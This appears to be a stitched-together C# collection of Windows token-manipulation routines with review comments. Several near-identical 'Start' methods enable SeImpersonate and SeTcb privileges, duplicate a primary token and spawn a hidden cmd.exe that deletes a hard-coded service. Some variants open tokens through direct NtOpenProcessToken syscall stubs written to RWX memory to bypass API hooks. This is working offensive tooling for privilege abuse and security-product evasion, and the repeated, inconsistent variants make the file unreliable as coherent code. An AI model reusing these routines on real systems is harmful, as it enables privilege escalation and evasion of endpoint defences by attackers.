/// <summary>
/// Convenience wrapper over <see cref="DuplicateTokenEx"/> that collapses the two failure
/// signals (a false return and an unspecified out value) into one: on failure
/// <paramref name="duplicated"/> is always <see cref="IntPtr.Zero"/>.
/// </summary>
/// <param name="token">Existing token handle to duplicate.</param>
/// <param name="tokenAccess">Access rights requested on the new token.</param>
/// <param name="se">Impersonation level of the new token.</param>
/// <param name="type">Whether to create a primary or an impersonation token.</param>
/// <param name="duplicated">Receives the new token handle, or IntPtr.Zero if the call failed.</param>
/// <remarks>
/// The token-attributes argument is always passed as IntPtr.Zero (default security). The
/// Win32 error code is not surfaced to the caller. Per Win32 ownership rules the caller is
/// responsible for closing a non-zero handle.
/// </remarks>
public static void duplicateToken(IntPtr token, TokenAccessFlags tokenAccess, SECURITY_IMPERSONATION_LEVEL se, TOKEN_TYPE type, out IntPtr duplicated)
{
    IntPtr newHandle;
    bool succeeded = DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, se, type, out newHandle);
    duplicated = succeeded ? newHandle : IntPtr.Zero;
}
/// <summary>
/// P/Invoke of the Win32 <c>DuplicateTokenEx</c> routine: creates a new primary or
/// impersonation token that duplicates <paramref name="hExistingToken"/>.
/// </summary>
/// <param name="hExistingToken">Token to duplicate (Win32 requires TOKEN_DUPLICATE access on it).</param>
/// <param name="dwDesiredAccess">Access rights requested on the new token.</param>
/// <param name="lpThreadAttributes">
/// Despite the name, this slot is Win32's <c>lpTokenAttributes</c> (optional SECURITY_ATTRIBUTES*).
/// Callers in this file pass IntPtr.Zero.
/// </param>
/// <param name="ImpersonationLevel">Impersonation level of the new token.</param>
/// <param name="TokenType">Primary or impersonation token.</param>
/// <param name="phNewToken">Receives the new token handle; the caller must close it.</param>
/// <returns>true on success, false on failure.</returns>
/// <remarks>
/// NOTE(review): the DllImport attribute is outside this excerpt, so whether SetLastError is
/// set (and therefore whether Marshal.GetLastWin32Error is meaningful after a failure) cannot
/// be confirmed here.
/// </remarks>
public static extern bool DuplicateTokenEx( IntPtr hExistingToken, TokenAccessFlags dwDesiredAccess, IntPtr lpThreadAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, out IntPtr phNewToken);
/// <summary>
/// P/Invoke of the Win32 <c>DuplicateTokenEx</c> routine (PascalCase enum variant of the same
/// import): creates a new primary or impersonation token duplicating <paramref name="hExistingToken"/>.
/// </summary>
/// <param name="hExistingToken">Token to duplicate (Win32 requires TOKEN_DUPLICATE access on it).</param>
/// <param name="dwDesiredAccess">Access rights requested on the new token.</param>
/// <param name="lpThreadAttributes">
/// Despite the name, this slot is Win32's <c>lpTokenAttributes</c> (optional SECURITY_ATTRIBUTES*).
/// Callers in this file pass IntPtr.Zero.
/// </param>
/// <param name="impersonationLevel">Impersonation level of the new token.</param>
/// <param name="tokenType">Primary or impersonation token.</param>
/// <param name="phNewToken">Receives the new token handle; the caller must close it.</param>
/// <returns>true on success, false on failure.</returns>
/// <remarks>
/// NOTE(review): the DllImport attribute is not visible here; SetLastError behaviour is unconfirmed.
/// </remarks>
public static extern bool DuplicateTokenEx( IntPtr hExistingToken, TokenAccessFlags dwDesiredAccess, IntPtr lpThreadAttributes, SecurityImpersonationLevel impersonationLevel, TokenType tokenType, out IntPtr phNewToken);
/// <summary>
/// Duplicates <paramref name="token"/> via <see cref="DuplicateTokenEx"/> with default token
/// attributes, reporting failure as <see cref="IntPtr.Zero"/> in <paramref name="duplicated"/>
/// instead of a return value.
/// </summary>
/// <param name="token">Existing token handle to duplicate.</param>
/// <param name="tokenAccess">Access rights requested on the new token.</param>
/// <param name="se">Impersonation level of the new token.</param>
/// <param name="type">Primary or impersonation token.</param>
/// <param name="duplicated">The new token handle, or IntPtr.Zero when duplication failed.</param>
/// <remarks>
/// The Win32 error is not surfaced. A non-zero handle is owned by the caller and must be
/// closed with CloseHandle.
/// </remarks>
public static void DuplicateToken(IntPtr token, TokenAccessFlags tokenAccess, SecurityImpersonationLevel se, TokenType type, out IntPtr duplicated)
{
    if (DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, se, type, out duplicated))
    {
        return;
    }

    // Do not hand back whatever the native call left in the out slot on failure.
    duplicated = IntPtr.Zero;
}
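/// <summary>
/// Launches a hidden <c>cmd.exe</c> running <c>sc delete NewDefaultService2</c> under a primary
/// token duplicated from the current identity. <see cref="CreateProcessAsUserW"/> is tried first
/// (published as method 1); if it fails, <see cref="CreateProcessWithTokenW"/> is tried
/// (method 2). On success the token handle and method number are stored in <c>TokenManager</c>.
/// </summary>
/// <remarks>
/// Review notes:
/// <list type="bullet">
/// <item>The four privileges are only <em>enabled</em>; they must already be present in the
/// process token. The result of <c>enablePrivileges</c> is not checked, so a missing privilege
/// shows up later as a failed launch.</item>
/// <item>Both launches now pass <c>null</c> as lpApplicationName and the full command line as
/// lpCommandLine, matching the Win32 prototypes (and the sibling static <c>Start</c>). The
/// previous code put the whole command line in the application-name slot of
/// CreateProcessAsUserW, which makes CreateProcess look for a file of that name, so method 1
/// could never succeed. This assumes the P/Invoke declaration accepts a string for lpCommandLine.</item>
/// <item>The service name and cmd.exe path are hard-coded; presumably NewDefaultService2 is
/// created elsewhere in this tool and this is its cleanup - confirm against the caller.</item>
/// <item>The process/thread handles returned in <c>processInfo</c> are never closed (field
/// names are declared elsewhere). If neither launch succeeds the duplicated token is now closed
/// instead of leaked.</item>
/// <item>Every exception is swallowed; callers can detect failure only by inspecting TokenManager.</item>
/// </list>
/// </remarks>
public void Start()
{
    try
    {
        IntPtr token = WindowsIdentity.GetCurrent().Token;

        // Privileges needed to assign a primary token / spawn a process with it.
        List<string> aPrivs = new List<string>
        {
            "SeImpersonatePrivilege",
            "SeTcbPrivilege",
            "SeAssignPrimaryTokenPrivilege",
            "SeIncreaseQuotaPrivilege",
        };

        IntPtr currentToken;
        if (OpenProcessToken(Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, out currentToken))
        {
            enablePrivileges(currentToken, aPrivs);
            CloseHandle(currentToken);
        }

        TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY
            | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY
            | TokenAccessFlags.TOKEN_DUPLICATE
            | TokenAccessFlags.TOKEN_ADJUST_DEFAULT
            | TokenAccessFlags.TOKEN_ADJUST_SESSIONID;

        // Both CreateProcessAsUser and CreateProcessWithToken require a primary token.
        IntPtr newToken = IntPtr.Zero;
        if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
        {
            return;
        }

        STARTUPINFO startupInfo = new STARTUPINFO();
        startupInfo.cb = Marshal.SizeOf(startupInfo);
        startupInfo.lpDesktop = "";
        startupInfo.wShowWindow = 0;        // SW_HIDE
        startupInfo.dwFlags |= 0x00000001;  // STARTF_USESHOWWINDOW: make wShowWindow effective
        PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
        LogonFlags l = new LogonFlags();

        const string commandLine = @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit";

        // Method 1: per Win32 docs this path normally needs SeAssignPrimaryTokenPrivilege (+ SeIncreaseQuotaPrivilege).
        if (CreateProcessAsUserW(newToken, null, commandLine, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 1;
            return;
        }

        // Method 2: needs SeImpersonatePrivilege only.
        if (CreateProcessWithTokenW(newToken, l, null, commandLine, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 2;
            return;
        }

        // Nobody retained the duplicate: release it rather than leak the handle.
        CloseHandle(newToken);
    }
    catch
    {
        // Deliberately best-effort; failure is observable only through TokenManager.
    }
}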
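/// <summary>
/// Opens the access token of <paramref name="handle"/> by executing an <c>NtOpenProcessToken</c>
/// syscall stub directly, bypassing the advapi32/kernelbase export.
/// </summary>
/// <param name="handle">Process handle whose token is wanted.</param>
/// <param name="access">Access mask requested on the token.</param>
/// <param name="currentToken">Receives the token handle, or IntPtr.Zero if anything fails.</param>
/// <param name="sysCall">Supplies the stub bytes for the named routine.</param>
/// <remarks>
/// Review notes: the stub is copied into a freshly committed PAGE_EXECUTE_READWRITE region that is
/// never released - no VirtualFree import is visible in this file - so each call leaks a page and
/// leaves a non-image-backed RWX region behind; both are common EDR indicators. A zero NTSTATUS is
/// treated as success. The status is converted with Convert.ToInt64 (or IntPtr.ToInt64) instead of
/// an unboxing cast, so the check no longer depends on whether the <c>NtOpenProcessToken</c>
/// delegate is declared to return int, uint or IntPtr (an unboxing cast throws on a mismatch).
/// </remarks>
public static void GetProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SysCallManager sysCall)
{
    currentToken = IntPtr.Zero;

    var stub = sysCall.GetSysCallAsm("NtOpenProcessToken");
    if (stub == null || stub.Length == 0)
    {
        return;
    }

    // RWX so the stub can be written and then executed in place; see remarks.
    var stubBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)stub.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
    if (stubBuffer == IntPtr.Zero)
    {
        return;
    }
    Marshal.Copy(stub, 0, stubBuffer, stub.Length);

    var invoke = Marshal.GetDelegateForFunctionPointer(stubBuffer, typeof(NtOpenProcessToken));

    // DynamicInvoke writes out-parameters back into the argument array (slot 2 here).
    object[] args = { handle, access, IntPtr.Zero };
    object status = invoke.DynamicInvoke(args);

    // STATUS_SUCCESS == 0; a null (void delegate) is treated as success as well.
    long code = status is IntPtr p ? p.ToInt64() : Convert.ToInt64(status);
    if (code == 0)
    {
        currentToken = (IntPtr)args[2];
    }
}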
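/// <summary>
/// Opens the access token of <paramref name="handle"/> with the rights in <paramref name="access"/>.
/// </summary>
/// <param name="handle">Process handle whose token is wanted.</param>
/// <param name="access">Access mask requested on the token.</param>
/// <param name="currentToken">Receives the token handle, or IntPtr.Zero if OpenProcessToken fails.</param>
/// <remarks>
/// The previous body ignored both parameters and always opened the current process with
/// TOKEN_ADJUST_PRIVILEGES, so a caller asking for another process's token, or for
/// TOKEN_QUERY/TOKEN_DUPLICATE, silently got the wrong handle and rights. It now honours the
/// arguments and, like <c>GetProcessToken</c>, reports failure as IntPtr.Zero. Callers that were
/// passing the current process handle and TOKEN_ADJUST_PRIVILEGES see no change. The caller owns
/// the returned handle.
/// </remarks>
public static void getProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken)
{
    IntPtr opened;
    if (!OpenProcessToken(handle, access, out opened))
    {
        opened = IntPtr.Zero;
    }
    currentToken = opened;
}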
/// <summary>
/// P/Invoke of the Win32 <c>OpenProcessToken</c> routine: opens the access token associated with
/// <paramref name="ProcessHandle"/>.
/// </summary>
/// <param name="ProcessHandle">Process whose token is opened; Win32 requires PROCESS_QUERY_INFORMATION (or PROCESS_QUERY_LIMITED_INFORMATION) on it.</param>
/// <param name="DesiredAccess">Token access rights requested.</param>
/// <param name="TokenHandle">Receives the token handle; the caller must close it.</param>
/// <returns>true on success, false on failure.</returns>
/// <remarks>NOTE(review): the DllImport attribute is outside this excerpt; SetLastError behaviour is unconfirmed.</remarks>
public static extern bool OpenProcessToken(IntPtr ProcessHandle, TokenAccessFlags DesiredAccess, out IntPtr TokenHandle);
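/// <summary>
/// Launches a hidden <c>cmd.exe</c> running <c>sc delete NewDefaultService2</c> under a primary
/// token duplicated from the current identity. <see cref="CreateProcessAsUserW"/> is tried first
/// (method 1), then <see cref="CreateProcessWithTokenW"/> (method 2); on success the token and the
/// method number are stored in <c>TokenManager</c>. The process token used to enable privileges is
/// obtained through a direct <c>NtOpenProcessToken</c> syscall via <c>GetProcessToken</c>.
/// </summary>
/// <remarks>
/// Review notes:
/// <list type="bullet">
/// <item>The privileges are only <em>enabled</em>; they must already be in the process token.
/// <c>EnablePrivileges</c> is now skipped when the token could not be opened (GetProcessToken
/// reports that as IntPtr.Zero) instead of being handed a zero handle.</item>
/// <item>The duplicated token is closed when neither launch succeeds; previously it leaked.</item>
/// <item>The PROCESS_INFORMATION of the child is discarded, so its process/thread handles are
/// never closed.</item>
/// <item><c>const LogonFlags ... = new LogonFlags()</c> was replaced by a plain local: a
/// constant of a non-primitive type is compiler-specific and the value is the same.</item>
/// <item>The service name and cmd.exe path are hard-coded - presumably NewDefaultService2 is
/// created elsewhere and this is its cleanup; confirm against the caller. All exceptions are
/// swallowed.</item>
/// </list>
/// </remarks>
public static void Start()
{
    var sysCall = new SysCallManager();
    try
    {
        var token = WindowsIdentity.GetCurrent().Token;

        // Privileges needed to assign a primary token / spawn a process with it.
        var privileges = new List<string>
        {
            "SeImpersonatePrivilege",
            "SeTcbPrivilege",
            "SeAssignPrimaryTokenPrivilege",
            "SeIncreaseQuotaPrivilege",
        };

        var currentToken = IntPtr.Zero;
        GetProcessToken(Process.GetCurrentProcess().Handle, TokenAccessFlags.TokenAdjustPrivileges, out currentToken, sysCall);
        if (currentToken != IntPtr.Zero)
        {
            EnablePrivileges(currentToken, privileges);
            CloseHandle(currentToken);
        }

        var tokenAccess = TokenAccessFlags.TokenQuery
            | TokenAccessFlags.TokenAssignPrimary
            | TokenAccessFlags.TokenDuplicate
            | TokenAccessFlags.TokenAdjustDefault
            | TokenAccessFlags.TokenAdjustSessionId;

        // Both launch APIs require a primary token.
        if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SecurityImpersonationLevel.SecurityImpersonation, TokenType.TokenPrimary, out var newToken))
        {
            return;
        }

        var startupInfo = new StartupInfo();
        startupInfo.cb = Marshal.SizeOf(startupInfo);
        startupInfo.lpDesktop = "";
        startupInfo.wShowWindow = 0;        // SW_HIDE
        startupInfo.dwFlags |= 0x00000001;  // STARTF_USESHOWWINDOW: make wShowWindow effective
        var logonFlags = new LogonFlags();

        const string commandLine = @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit";

        // Method 1: per Win32 docs normally needs SeAssignPrimaryTokenPrivilege (+ SeIncreaseQuotaPrivilege).
        if (CreateProcessAsUserW(newToken, null, commandLine, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out _))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 1;
            return;
        }

        // Method 2: needs SeImpersonatePrivilege only.
        if (CreateProcessWithTokenW(newToken, logonFlags, null, commandLine, 0, IntPtr.Zero, null, ref startupInfo, out _))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 2;
            return;
        }

        // Nobody retained the duplicate: release it rather than leak the handle.
        CloseHandle(newToken);
    }
    catch
    {
        // Deliberately best-effort; failure is observable only through TokenManager.
    }
}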
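/// <summary>
/// Launches a hidden <c>cmd.exe</c> running <c>sc delete NewDefaultService2</c> under a primary
/// token duplicated from the current identity. The process token used to enable privileges is
/// opened with an inline <c>NtOpenProcessToken</c> syscall stub. <see cref="CreateProcessAsUserW"/>
/// is tried first (method 1), then <see cref="CreateProcessWithTokenW"/> (method 2); on success the
/// token and method number are stored in <c>TokenManager</c>.
/// </summary>
/// <remarks>
/// Review notes:
/// <list type="bullet">
/// <item>Both launches now pass <c>null</c> as lpApplicationName and the command line as
/// lpCommandLine, matching the Win32 prototypes and the sibling static <c>Start</c>. The previous
/// code put the command line in the application-name slot of both calls, which makes CreateProcess
/// look for a file of that name and fail. This assumes the P/Invoke declarations accept a string
/// for lpCommandLine.</item>
/// <item>The syscall return value is now checked (zero NTSTATUS = success, converted without an
/// unboxing cast so the delegate's declared return type does not matter); on failure the privilege
/// step is skipped instead of being handed an uninitialised handle.</item>
/// <item>The RWX stub buffer is never released - no VirtualFree import is visible in this file -
/// so each call leaks a page and leaves a non-image-backed RWX region behind (an EDR indicator).</item>
/// <item>The duplicated token is closed when neither launch succeeds; previously it leaked. The
/// child's process/thread handles in <c>processInfo</c> are still never closed.</item>
/// <item>The service name and cmd.exe path are hard-coded - presumably NewDefaultService2 is
/// created elsewhere and this is its cleanup; confirm against the caller. All exceptions are
/// swallowed. The unused <c>baseAddr</c> local was removed.</item>
/// </list>
/// </remarks>
public void Start()
{
    SyscallManager syscall = new SyscallManager();
    try
    {
        IntPtr token = WindowsIdentity.GetCurrent().Token;

        // Privileges needed to assign a primary token / spawn a process with it.
        List<string> aPrivs = new List<string>
        {
            "SeImpersonatePrivilege",
            "SeTcbPrivilege",
            "SeAssignPrimaryTokenPrivilege",
            "SeIncreaseQuotaPrivilege",
        };

        // Open our own token through a direct NtOpenProcessToken stub (see remarks re: RWX leak).
        IntPtr currentToken = IntPtr.Zero;
        byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken");
        if (shellcode != null && shellcode.Length > 0)
        {
            var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
            if (shellcodeBuffer != IntPtr.Zero)
            {
                Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
                var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));

                // DynamicInvoke writes the out-parameter back into slot 2 of the array.
                object[] arguments = { Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, IntPtr.Zero };
                object status = syscallDelegate.DynamicInvoke(arguments);
                long code = status is IntPtr p ? p.ToInt64() : Convert.ToInt64(status);
                if (code == 0)
                {
                    currentToken = (IntPtr)arguments[2];
                }
            }
        }

        if (currentToken != IntPtr.Zero)
        {
            enablePrivileges(currentToken, aPrivs);
            CloseHandle(currentToken);
        }

        TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY
            | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY
            | TokenAccessFlags.TOKEN_DUPLICATE
            | TokenAccessFlags.TOKEN_ADJUST_DEFAULT
            | TokenAccessFlags.TOKEN_ADJUST_SESSIONID;

        // Both launch APIs require a primary token.
        IntPtr newToken = IntPtr.Zero;
        if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
        {
            return;
        }

        STARTUPINFO startupInfo = new STARTUPINFO();
        startupInfo.cb = Marshal.SizeOf(startupInfo);
        startupInfo.lpDesktop = "";
        startupInfo.wShowWindow = 0;        // SW_HIDE
        startupInfo.dwFlags |= 0x00000001;  // STARTF_USESHOWWINDOW: make wShowWindow effective
        PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
        LogonFlags l = new LogonFlags();

        const string commandLine = @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit";

        // Method 1: per Win32 docs normally needs SeAssignPrimaryTokenPrivilege (+ SeIncreaseQuotaPrivilege).
        if (CreateProcessAsUserW(newToken, null, commandLine, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 1;
            return;
        }

        // Method 2: needs SeImpersonatePrivilege only.
        if (CreateProcessWithTokenW(newToken, l, null, commandLine, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 2;
            return;
        }

        // Nobody retained the duplicate: release it rather than leak the handle.
        CloseHandle(newToken);
    }
    catch
    {
        // Deliberately best-effort; failure is observable only through TokenManager.
    }
}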
/// <summary>
/// P/Invoke of the Win32 <c>OpenProcessToken</c> routine: opens the access token associated with
/// <paramref name="ProcessHandle"/>.
/// </summary>
/// <param name="ProcessHandle">Process whose token is opened; Win32 requires PROCESS_QUERY_INFORMATION (or PROCESS_QUERY_LIMITED_INFORMATION) on it.</param>
/// <param name="DesiredAccess">Token access rights requested.</param>
/// <param name="TokenHandle">Receives the token handle; the caller must close it.</param>
/// <returns>true on success, false on failure.</returns>
/// <remarks>NOTE(review): the DllImport attribute is outside this excerpt; SetLastError behaviour is unconfirmed.</remarks>
static extern Boolean OpenProcessToken(IntPtr ProcessHandle, TokenAccessFlags DesiredAccess, out IntPtr TokenHandle);
/// <summary>
/// P/Invoke of the Win32 <c>OpenThreadToken</c> routine: opens the impersonation token of
/// <paramref name="ThreadHandle"/>, if the thread is impersonating.
/// </summary>
/// <param name="ThreadHandle">Thread whose token is opened.</param>
/// <param name="DesiredAccess">Token access rights requested.</param>
/// <param name="OpenAsSelf">
/// When true the access check is made against the process's security context rather than the
/// thread's current (impersonated) context - the usual choice when the impersonated client has
/// fewer rights than the process itself.
/// </param>
/// <param name="TokenHandle">Receives the token handle; the caller must close it.</param>
/// <returns>true on success; false if the call fails, which per Win32 includes the thread not impersonating (ERROR_NO_TOKEN).</returns>
/// <remarks>NOTE(review): the DllImport attribute is outside this excerpt; SetLastError behaviour is unconfirmed.</remarks>
static extern Boolean OpenThreadToken(IntPtr ThreadHandle, TokenAccessFlags DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);
/// <summary>
/// P/Invoke of the Win32 <c>OpenProcessToken</c> routine: opens the access token associated with
/// <paramref name="ProcessHandle"/>. This variant marshals the flags enum explicitly as a 32-bit
/// unsigned DWORD.
/// </summary>
/// <param name="ProcessHandle">Process whose token is opened; Win32 requires PROCESS_QUERY_INFORMATION (or PROCESS_QUERY_LIMITED_INFORMATION) on it.</param>
/// <param name="dwDesiredAccess">Token access rights requested, marshalled as U4.</param>
/// <param name="TokenHandle">Receives the token handle; the caller must close it.</param>
/// <returns>true on success, false on failure.</returns>
/// <remarks>NOTE(review): the DllImport attribute is outside this excerpt; SetLastError behaviour is unconfirmed.</remarks>
public static extern bool OpenProcessToken(IntPtr ProcessHandle, [MarshalAs(UnmanagedType.U4)] TokenAccessFlags dwDesiredAccess, out IntPtr TokenHandle);